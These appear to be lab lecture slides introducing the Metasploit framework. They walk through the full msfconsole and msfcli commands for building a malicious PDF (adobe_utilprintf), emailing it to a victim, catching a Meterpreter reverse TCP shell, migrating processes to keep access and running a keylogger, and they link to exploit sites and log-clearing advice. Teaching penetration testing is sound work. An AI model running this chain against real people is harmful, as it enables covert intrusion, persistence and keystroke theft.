METASPLOIT. WHAT IS METASPLOIT? Metasploit is a framework for creating exploits Written in Ruby Created originally by HD Moore Many Developers Worldwide.

METASPLOIT

WHAT IS METASPLOIT?

• Metasploit is a framework for creating exploits• Written in Ruby• Created originally by HD Moore• Many Developers Worldwide• Commercial Version available from Rapid7

HD Moore James Lee Joshua J. Drake Mike Smith Tod Beardsley Jon Cran MC Ramon Valle Patrick Webster

Efrain Torres Stephen Fewer Lurene Grenier Steve Tornio Nathan Keltner I)ruid Chris Gates Kris Katterjohn Carlos Perez

Metasploit Pro

TODAYS OBJECTIVES

• Create a Malicious PDF file• Have a user (victim) open that file• Change process ID so we have

continued access to the victim• Gather info from the victim via a

keylogger

BASIC STEPS

The basic format for exploiting a system:

1. Pick which exploit to use2. Configure the exploit3. Pick a payload4. Configure the payload5. Execute the exploit

STARTING METASPLOIT

• Open a terminal session• Make sure you are in the right directory• Type “sudo msfconsole” at the command line• Updating Metasploit• On the Windows platform, launch the

Metasploit Update.• On Linux simply enter msfupdate as root

STARTING METASPLOIT cont.

Got cow?

CORE COMMANDSWe will be using a limited command set in our lab today.Here are all the possible commands we could use.

• ? Help menu• back Move back from the current context• banner Display an awesome metasploit banner• cd Change the current working directory• color Toggle color• connect Communicate with a host• exit Exit the console• help Help menu• info Displays information about one or more

module• irb Drop into irb scripting mode• jobs Displays and manages jobs• kill kill a job• load Load a framework plugin

CORE COMMANDS (cont.)• loadpath Searches for and loads modules from a path• quit Exit the console• resource Run the commands stored in a file• route Route traffic through a session• save Saves the active datastores• search Searches module names and descriptions• sessions Dump session listings and display information about

sessions• set Sets a variable to a value• setg Sets a global variable to a value• show Displays modules of a given type, or all modules• sleep Do nothing for the specified number of seconds• unload Unload a framework plugin• unset Unsets one or more variables• unsetg Unsets one or more global variables• use Selects a module by name• version Show the framework and console library version

numbers

CREATE MALICIOUS PDF• Create PDF• Include Meterpreter payload• Email Malicious PDF to victim

CREATING PDF

uopadmin@Attacker1:~# sudo msfconsolemsf > use

exploit/windows/fileformat/adobe_utilprintf msf exploit(adobe_utilprintf) >

CREATING PDF cont.

CREATING PDF cont.msf exploit(adobe_utilprintf) > infomsf exploit(adobe_utilprintf) > set OUTPUTPATH ~OUTPUTPATH => ~msf exploit(adobe_utilprintf) > set filename help.pdffilename => help.pdfmsf exploit(adobe_utilprintf) > show payloadsmsf exploit(adobe_utilprintf) > set PAYLOAD

windows/meterpreter/reverse_tcpPAYLOAD => windows/meterpreter/reverse_tcpmsf exploit(adobe_utilprintf) > set LHOST 192.168.0.xLHOST => 192.168.0.xmsf exploit(adobe_utilprintf) > set LPORT 80LPORT => 80msf exploit(adobe_utilprintf) > exploit

VICTIM RECEIVES FILE

• Victim opens file• Exploit is launched• Connection made back to badguy

machine• Begin using Meterpreter

USING METERPRETER

• Changing process ID• Installing a key logger remotely

EXPLOITING

• msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LPORT=80 LHOST=192.168.0.201 E

CHANGING PROCESS ID USING METERPRETER

• sysinfo: Show the system name and OS type

• ps: Show process IDs• getpid: Show the process ID of

meterpreter• migrate: Migrate to another process ID

INSTALL KEYLOGGER VIA METERPRETER

• keyscan_start: Start key logger• keyscan_dump: Read key logger data

USEFUL LINKS• ### Main site• http://www.metasploit.com

• ### User Guide• http://www.metasploit.com/documents/users_guide.pdf

• ### Wiki• http://www.metasploit.com/redmine/projects/framework/wiki/Page_index

• ### exploits and POCs• http://milw0rm.com/exploits/

• Metasploit PDF Exploit• http://carnal0wnage.blogspot.com/2008/11/metasploit-adobe-utilprintf-client-side.html

• ### VNC Word Macro Exploit• http://devilz-kiddies.blogspot.com/2009/09/metasploit-reverse-vnc-hidden-in-word.html

• ### Module Info• http://www.metasploit.com/modules/

• ### clearing event logs• http://seclists.org/metasploit/2008/q4/153

• ### exe2vba• http://www.securiteam.com/tools/5KP0J2KFPQ.html• http://www.metasploit.com/redmine/projects/framework/repository/revisions/6708/entry/tools/

exe2vba.rb

CONTACT INFO• [email protected] (that’s a zero)